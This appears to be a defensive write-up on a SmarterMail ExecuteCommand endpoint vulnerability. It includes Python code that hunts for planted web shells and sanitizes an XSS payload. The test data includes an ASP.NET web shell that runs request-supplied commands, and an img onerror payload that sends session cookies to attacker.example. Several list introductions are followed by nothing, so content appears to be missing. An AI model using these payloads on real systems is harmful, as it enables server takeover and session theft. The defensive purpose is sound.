The vulnerability resided in a specific API endpoint: /Services/ServiceController.svc/ExecuteCommand. The ".svc" extension indicates a Windows Communication Foundation (WCF) service, a .NET framework that deserializes request bodies into typed objects before the service method runs, which is why such services carry a large input-handling surface.

SmarterMail uses this endpoint internally for legitimate administrative tasks, such as starting and stopping services or retrieving server diagnostics. However, the exploit against Build 6919 showed that the endpoint:

SmarterTools released Build 6922 to address this. The fix involved:

The Gotcha: Patching closes the door; it does not evict whoever already walked through it. Suppose an attacker used the bug to plant a shell in a log file on January 1st and you upgrade to Build 6922 on January 15th. The upgrade blocks the original entry vector, but the planted file is still on disk and will execute if the attacker finds any other way to have the web server serve it. Worse, any persistence set up in the meantime, such as a scheduled task or a service, keeps running unaffected by the upgrade. In that situation patching alone is futile: you have to hunt for and remove what was left behind, and treat the host as compromised until you have.
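A post-patch hunt of the kind that paragraph calls for, written here as an added example rather than anything SmarterTools ships. It scans a log directory for ASP.NET markup that has no business in a plain-text mail log, and walks web-server access lines looking for ExecuteCommand calls from outside an administrator allowlist and for log files fetched over HTTP. Everything about the layout is an assumption for illustration: the W3C field order, the idea that logs might be reachable through the web server, the marker list, and the sample log lines, which are constructed.

```python
"""Post-patch hunting helpers: added example, not SmarterTools code.

Assumptions (all hypothetical, for illustration): SmarterMail log files sit under
one directory; the web server writes IIS-style W3C access logs with the field
order shown in SAMPLE_ACCESS_LOG; an attacker who abused
/Services/ServiceController.svc/ExecuteCommand may have written ASP.NET markup
into a log file so that it runs when that file is later served as a page.
"""
import os
import re
import tempfile

VULN_ENDPOINT = "/Services/ServiceController.svc/ExecuteCommand"

# Strings that have no business in a plain-text mail log: ASP.NET page and
# server-script delimiters plus the usual web-shell building blocks.
WEBSHELL_MARKERS = [
    re.compile(rb"<%@\s*Page", re.I),
    re.compile(rb"<script[^>]+runat\s*=\s*['\"]?server", re.I),
    re.compile(rb"Eval\s*\(\s*Request", re.I),
    re.compile(rb"System\.Diagnostics\.Process", re.I),
]


def scan_file_for_webshell(path):
    """Return the marker patterns found in one file (empty list if clean).
    The whole file is read at once; chunked reading would need overlap handling."""
    with open(path, "rb") as f:
        data = f.read()
    return sorted(p.pattern.decode() for p in WEBSHELL_MARKERS if p.search(data))


def scan_log_dir(root):
    """Walk a directory tree; map every file containing markers to what was found."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file_for_webshell(path)
            if hits:
                findings[path] = hits
    return findings


def suspicious_endpoint_hits(log_lines, admin_ips):
    """Flag W3C-style access-log lines worth a look after the patch:
    ExecuteCommand calls from outside the admin allowlist, and GETs of .log
    files (the trigger a planted shell would need)."""
    flagged = []
    for line in log_lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        date, time, client_ip, method, uri, status = fields[:6]
        reason = None
        if uri.lower() == VULN_ENDPOINT.lower() and client_ip not in admin_ips:
            reason = "ExecuteCommand called from an address not on the admin allowlist"
        elif method == "GET" and uri.lower().endswith(".log"):
            reason = "log file fetched over HTTP (possible trigger for a planted shell)"
        if reason:
            flagged.append({"time": f"{date} {time}", "ip": client_ip,
                            "uri": uri, "status": status, "reason": reason})
    return flagged


# Constructed sample data; addresses are RFC 5737 documentation ranges.
SAMPLE_ACCESS_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2025-01-01 03:12:44 203.0.113.7 POST /Services/ServiceController.svc/ExecuteCommand 200
2025-01-01 03:12:45 203.0.113.7 GET /Logs/2025.01.01-smtpLog.log 200
2025-01-15 09:00:02 192.0.2.10 POST /Services/ServiceController.svc/ExecuteCommand 200
2025-01-15 09:00:05 192.0.2.10 GET /interface/root 200
"""

CLEAN_LOG = b"03:12:44 [203.0.113.7] rsp: 220 mail.example ESMTP ready\n"
PLANTED_LOG = (
    b"03:12:44 [203.0.113.7] cmd: EHLO "
    b'<%@ Page Language="C#" %><script runat="server">'
    b'void Page_Load(){System.Diagnostics.Process.Start(Request["c"]);}'
    b"</script>\n"
)


def build_demo_logs():
    """Write one clean and one planted log into a temp directory; return its path."""
    root = tempfile.mkdtemp(prefix="sm-logs-")
    with open(os.path.join(root, "2025.01.01-smtpLog.log"), "wb") as f:
        f.write(CLEAN_LOG)
    with open(os.path.join(root, "2025.01.02-smtpLog.log"), "wb") as f:
        f.write(PLANTED_LOG)
    return root


if __name__ == "__main__":
    root = build_demo_logs()
    for path, hits in scan_log_dir(root).items():
        print(f"WEBSHELL MARKERS in {path}: {hits}")
    for hit in suspicious_endpoint_hits(SAMPLE_ACCESS_LOG.splitlines(), {"192.0.2.10"}):
        print(f"{hit['time']} {hit['ip']} {hit['uri']} -> {hit['reason']}")
```

Point scan_log_dir at the real log directory and feed suspicious_endpoint_hits the real access log with your administrators' addresses. The scheduled tasks and services the paragraph mentions are not covered by this script; enumerate them separately (schtasks /query or Get-ScheduledTask, and sc query or Get-Service) and compare against a known-good inventory.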

When the administrator logs into SmarterMail via the web interface and opens the calendar entry or the specially crafted email, the browser renders the injected markup. The onerror handler fires, and the administrator's session cookie (including their ASP.NET_SessionId) is silently sent to the attacker's remote server. One caveat: script can only read the cookie this way if it is not flagged HttpOnly. With HttpOnly set, the payload cannot read document.cookie directly, though it can still issue requests from inside the administrator's authenticated page, so the flag limits the damage rather than removing it.
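The two server-side controls that stop a payload like that from ever reaching the browser, shown as an added example rather than SmarterMail's own code: HTML-encoding for fields that are only ever text (a subject line or calendar title), and an allowlist sanitizer for content that must be rendered as HTML (an email body). The tag and attribute allowlists, the sample fragments, and the attacker.example host are assumptions constructed for illustration.

```python
"""Neutralising an onerror-style payload before the browser sees it.
Added example, not SmarterMail code. Two layers: HTML-encoding for fields that
are only ever text, and an allowlist sanitizer for HTML that must be rendered.
The allowlists below are assumptions chosen for illustration.
"""
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "img", "ul", "ol", "li", "div", "span"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Allowlist the scheme; javascript:, data:, vbscript: and friends all fail.
    The parser has already decoded entities, so an encoded scheme is caught too."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "mailto:", "/"))


def render_text_field(value):
    """Text-only fields: encode everything, so markup is displayed, never parsed."""
    return html.escape(value, quote=True)


class AllowlistSanitizer(HTMLParser):
    """Rebuild the fragment keeping only allowed tags and attributes.
    Every on* handler is dropped regardless of tag; script/style bodies are
    discarded rather than shown as text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # (tag, attr-or-None) pairs, useful for alerting
        self._skip = None      # set while inside a dropped script/style element

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            if tag in ("script", "style"):
                self._skip = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name))
                continue
            if name in ("href", "src") and not safe_url(value):
                self.dropped.append((tag, name))
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip:
                self._skip = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    """Return (clean_html, dropped) for an untrusted HTML fragment."""
    s = AllowlistSanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out), s.dropped


# Constructed payload of the kind described above; attacker.example is a placeholder.
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">'

if __name__ == "__main__":
    print(render_text_field(PAYLOAD))
    clean, dropped = sanitize_html(PAYLOAD)
    print(clean, dropped)
```

The dropped list is worth logging: an inbound message that loses an onerror attribute on an img tag is a detection signal, not just a rendering fix. This sanitizer illustrates the mechanism and does not balance unclosed tags; in production use a maintained library for the same job, and pair it with HttpOnly and SameSite on the session cookie so that a bypass yields less.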

If you were hit by this, don't blame the vendor entirely. Your defense-in-depth failed here: